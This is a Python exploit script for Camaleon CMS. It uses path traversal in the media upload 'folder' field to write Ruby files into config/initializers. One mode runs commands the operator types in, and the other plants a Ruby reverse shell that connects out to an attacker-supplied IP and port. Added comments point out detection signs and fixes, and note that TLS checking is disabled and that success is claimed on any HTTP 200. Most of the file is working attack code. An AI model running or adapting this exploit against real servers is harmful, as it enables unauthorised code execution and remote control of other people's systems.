import requests
def exploit_camaleon(auth_token, session_token, target_url, payload_type):
    """Upload a Ruby file through the Camaleon CMS admin media endpoint.

    NOTE(review): the listing lost its indentation when the page was
    rendered. The nesting below is reconstructed from the statements and
    should be confirmed against the original file.

    The request is a multipart POST to ``/admin/media/upload`` whose
    ``folder`` field is ``../../../config/initializers/``, a relative path
    that presumably climbs out of the directory uploads are meant to land
    in. The request carries the cookies of an existing session, so the
    script presupposes an account that is already logged in.

    What to look for on the server side:
      * POST requests to ``/admin/media/upload`` whose ``folder`` field
        contains ``..``.
      * ``command_exec.rb`` or ``reverse_shell.rb`` (the names used here),
        or any other unexpected file, under ``config/initializers``.

    What stops it: the upload handler resolving ``folder`` to a canonical
    path and rejecting anything outside the media root, and the account
    running the application having no write access to its own code tree.

    Args:
        auth_token: value sent as the ``auth_token`` cookie.
        session_token: value sent as the ``_cms_session`` cookie.
        target_url: base URL; the upload path is appended to it.
        payload_type: ``"command_execution"`` (interactive loop, one
            upload per entered line) or ``"reverse_shell"`` (a single
            upload). Any other value matches neither branch, so nothing
            is sent.

    Returns:
        None. Results are printed to standard output.
    """
    # Request headers. The multipart boundary is fixed and has to match the
    # boundary lines written by hand into the bodies below.
    headers = {
        'User-Agent': 'Mozilla/5.0',
        'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary80dMC9jX3srWAsga',
        'Accept': '*/*',
        'Connection': 'keep-alive',
    }
    # Session cookies of the logged-in account; the script does not log in
    # by itself.
    cookies = {
        'auth_token': auth_token,
        '_cms_session': session_token,
    }
    # Interactive mode: one upload per line typed by the operator.
    if payload_type == "command_execution":
        while True:
            # Prompt the user for a command to execute
            command = input("Enter a system command to execute (or type 'exit' to quit): ")
            if command.lower() == "exit":
                print("Exiting command execution mode.")
                break
            # Ruby source that becomes the uploaded file's content. The
            # banner lines it prints are a fixed string that can be searched
            # for in application logs.
            payload = (
                'puts "==============================="\r\n'
                'puts "= EXECUTING SYSTEM COMMANDS ="\r\n'
                'puts "==============================="\r\n'
                f'system("{command}")\r\n' # Execute the entered command
                'puts "==============================="\r\n'
            )
            # The same file name is used on every iteration.
            file_name = 'command_exec.rb'
            # Hand-built multipart body. The "folder" part carries the
            # traversal sequence and is the field a server-side check has
            # to canonicalize and confine to the media root.
            data = (
                f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
                f'Content-Disposition: form-data; name="file_upload"; filename="{file_name}"\r\n'
                f'Content-Type: text/x-ruby-script\r\n\r\n'
                f'{payload}\r\n'
                f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
                f'Content-Disposition: form-data; name="folder"\r\n\r\n'
                f'../../../config/initializers/\r\n'
                f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
                f'Content-Disposition: form-data; name="skip_auto_crop"\r\n\r\n'
                f'true\r\n'
                f'------WebKitFormBoundary80dMC9jX3srWAsga--\r\n'
            )
            # Send the POST request. verify=False turns off TLS certificate
            # validation, so the session cookies travel over a connection
            # whose peer is not authenticated.
            response = requests.post(
                f"{target_url}/admin/media/upload?actions=false",
                headers=headers,
                cookies=cookies,
                data=data,
                verify=False # Disable SSL verification (adjust as needed)
            )
            # HTTP 200 only shows that the server accepted the request.
            # Rails loads config/initializers at boot, so nothing here
            # confirms that the uploaded Ruby ran; the "executed
            # successfully" wording overstates what was checked.
            if response.status_code == 200:
                print(f"Command '{command}' executed successfully!")
                print("Response: ", response.text) # Print response content to debug
            else:
                print(f"Failed to execute '{command}' with status code: {response.status_code}")
                print("Response: ", response.text) # Print the response content for debugging
    elif payload_type == "reverse_shell":
        # Ruby source that opens an outbound TCP connection and passes each
        # received line to IO.popen. 'your_ip' and your_port are
        # placeholders left by the author. Egress filtering on the
        # application host blocks the outbound connection this payload
        # depends on.
        payload = (
            'require \'socket\'\r\n'
            's = TCPSocket.open(\'your_ip\', your_port)\r\n'
            'while (cmd = s.gets)\r\n'
            ' IO.popen(cmd, \'r\') do |io|\r\n'
            ' s.print io.read\r\n'
            ' end\r\n'
            'end\r\n'
        )
        file_name = 'reverse_shell.rb'
        # Same multipart layout as the other branch: file part, traversal
        # "folder" part, skip_auto_crop flag.
        data = (
            f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
            f'Content-Disposition: form-data; name="file_upload"; filename="{file_name}"\r\n'
            f'Content-Type: text/x-ruby-script\r\n\r\n'
            f'{payload}\r\n'
            f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
            f'Content-Disposition: form-data; name="folder"\r\n\r\n'
            f'../../../config/initializers/\r\n'
            f'------WebKitFormBoundary80dMC9jX3srWAsga\r\n'
            f'Content-Disposition: form-data; name="skip_auto_crop"\r\n\r\n'
            f'true\r\n'
            f'------WebKitFormBoundary80dMC9jX3srWAsga--\r\n'
        )
        # Send the POST request for reverse shell (TLS certificate
        # validation is off here as well).
        response = requests.post(
            f"{target_url}/admin/media/upload?actions=false",
            headers=headers,
            cookies=cookies,
            data=data,
            verify=False # Disable SSL verification (adjust as needed)
        )
        # As above, a 200 status reports an accepted upload and nothing more.
        if response.status_code == 200:
            print(f"Exploit executed successfully with reverse shell!")
        else:
            print(f"Failed with status code: {response.status_code}")
            # NOTE(review): placing this line under the else branch is an
            # assumption; the rendered page does not show its indentation.
            print("Response: ", response.text)
if __name__ == "__main__":
    # Placeholders to be filled in: the two cookies of an authenticated
    # session and the base URL of the Camaleon CMS instance under test.
    auth_token, session_token = "your_auth_token_here", "your_session_token_here"
    target_url = "https://target_site_here"

    # exploit_camaleon() compares the mode string verbatim, so any value
    # other than the two listed in the prompt matches neither branch.
    payload_type = input(
        "Enter payload type ('reverse_shell' or 'command_execution'): "
    ).strip()

    exploit_camaleon(
        auth_token=auth_token,
        session_token=session_token,
        target_url=target_url,
        payload_type=payload_type,
    )